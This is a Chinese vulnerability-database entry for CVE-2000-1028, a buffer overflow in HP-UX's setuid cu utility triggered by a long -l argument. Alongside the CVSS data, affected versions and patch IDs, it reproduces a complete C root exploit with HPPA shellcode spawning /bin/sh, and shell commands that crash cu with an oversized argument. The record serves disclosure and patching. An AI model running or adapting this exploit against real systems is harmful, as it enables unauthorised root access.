CVE-2000-1028
CVSS7.2
发布时间 :2000-12-11 00:00:00
修订时间 :2016-11-28 14:06:10
NMCOES    

[原文]Buffer overflow in cu program in HP-UX 11.0 may allow local users to gain privileges via a long -l command line argument.


[CNNVD]HP-UX cu缓冲区溢出漏洞(CNNVD-200012-065)

        HP-UX 11.0版本中cu程序存在缓冲区溢出漏洞。本地用户借助超长-l命令行参数提升特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:9.09HP HP-UX 9.9
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:9.08HP HP-UX 9.8
cpe:/o:hp:hp-ux:9.07HP HP-UX 9.7
cpe:/o:hp:hp-ux:9.01HP HP-UX 9.01
cpe:/o:hp:hp-ux:9.00HP HP-UX 9.0
cpe:/o:hp:hp-ux:9.05HP HP-UX 9.05
cpe:/o:hp:hp-ux:9.04HP HP-UX 9.4
cpe:/o:hp:hp-ux:9.10HP HP-UX 9.10
cpe:/o:hp:hp-ux:9.06HP HP-UX 9.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1028
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1028
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-065
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/142792
(UNKNOWN)  BUGTRAQ  20001102 HPUX cu -l option buffer overflow vulnerabilit
http://www.securityfocus.com/bid/1886
(VENDOR_ADVISORY)  BID  1886
http://xforce.iss.net/xforce/xfdb/5460
(UNKNOWN)  XF  hp-cu-bo(5460)

- 漏洞信息

HP-UX cu缓冲区溢出漏洞
高危 缓冲区溢出
2000-12-11 00:00:00 2005-10-20 00:00:00
本地  
        HP-UX 11.0版本中cu程序存在缓冲区溢出漏洞。本地用户借助超长-l命令行参数提升特权。

- 公告与补丁

        HP has released fixes:
        HP HP-UX 10.0 1
        

  •         HP PHCO_22763
            

  •         

        HP HP-UX 10.10
        

  •         HP PHCO_22765
            

  •         

        HP HP-UX 10.20
        

  •         HP PHCO_22764
            

  •         

        HP HP-UX 11.0
        

  •         HP PHCO_22766
            

  •         

        HP HP-UX (VVOS) 11.0.4
        

  •         HP PHCO_23424
            

  •         

        HP HP-UX 11.11
        

  •         HP PHCO_23909
            

  •         

- 漏洞信息 (245)

HP-UX 11.0 /bin/cu Privilege Escalation Exploit (EDBID:245)
hp-ux local
2001-01-13 Verified
0 zorgon
N/A [点击下载]
/*
 * Copyright (c) 2001 Zorgon                              
 * All Rights Reserved                                    
 * The copyright notice above does not evidence any       
 * actual or intended publication of such source code.    
 * 
 * HP-UX /bin/cu exploit.
 * Tested on HP-UX 11.00 
 * zorgon@antionline.org (http://www.nightbird.free.fr) 
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define LEN 9778 
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200    /* it works for me */

u_char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

int 
main(int argc , char **argv){
  char buffer[LEN+8];
  int i;
  long retaddr = RET;
  int offset = OFFSET;
 
  if(argc>1) offset = atoi(argv[1]);
    for (i=0;i<LEN;i+=4)
      *(long *)&buffer[i] = retaddr + offset; 

  for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++) 
    *(buffer+i) = HPPA_NOP;

  memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
  fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
  fprintf(stderr, "Copyright (c) 2001 Zorgon\n");                              
  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));

  execl("/bin/cu","cu","-l",buffer,0);
}


// milw0rm.com [2001-01-13]
		

- 漏洞信息 (20373)

HP-UX 9.x/10.x/11.x cu Buffer Overflow Vulnerability (EDBID:20373)
hp-ux dos
2000-11-02 Verified
0 zorgon
N/A [点击下载]
source: http://www.securityfocus.com/bid/1886/info

cu is a unix utility that is used for communication between two hosts (usually over phone lines). It is typically isntalled setuid root so that it can access communications hardware when executed by a regular user. 

The version of cu that ships with HP-UX is vulnerable to a buffer overflow attack that may result in an escalation of privileges if exploited properly. The argument to the -l option (the line) is handled in an unsafe manner and if the length of it exceeds 9777 bytes, it will corrupt vital stack variables. This may result in shellcode provided by the user being executed with the privileges of the process (euid 0).


$ ls -la `which cu`
-r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu

Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a chou : Requested device/system name not known

$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault
		

- 漏洞信息

9613
HP-UX cu -l Option Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-11-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP-UX cu Buffer Overflow Vulnerability
Boundary Condition Error 1886
No Yes
2000-11-02 12:00:00 2009-07-11 03:56:00
First posted to Bugtraq by zorgon <zorgon@linuxstart.com> on Nov 2, 2000.

- 受影响的程序版本

HP HP-UX (VVOS) 11.0.4
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0 1
HP HP-UX 9.10
HP HP-UX 9.9
HP HP-UX 9.8
HP HP-UX 9.7
HP HP-UX 9.6
HP HP-UX 9.5
HP HP-UX 9.4
HP HP-UX 9.1
HP HP-UX 9.0

- 漏洞讨论

cu is a unix utility that is used for communication between two hosts (usually over phone lines). It is typically isntalled setuid root so that it can access communications hardware when executed by a regular user.

The version of cu that ships with HP-UX is vulnerable to a buffer overflow attack that may result in an escalation of privileges if exploited properly. The argument to the -l option (the line) is handled in an unsafe manner and if the length of it exceeds 9777 bytes, it will corrupt vital stack variables. This may result in shellcode provided by the user being executed with the privileges of the process (euid 0).

- 漏洞利用

Example from zorgon's &lt;zorgon@linuxstart.com&gt; Bugtraq post:

$ ls -la `which cu`
-r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu

Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a chou : Requested device/system name not known

$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault

- 解决方案

HP has released fixes:


HP HP-UX 10.0 1
  • HP PHCO_22763


HP HP-UX 10.10
  • HP PHCO_22765


HP HP-UX 10.20
  • HP PHCO_22764


HP HP-UX 11.0
  • HP PHCO_22766


HP HP-UX (VVOS) 11.0.4
  • HP PHCO_23424


HP HP-UX 11.11
  • HP PHCO_23909

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站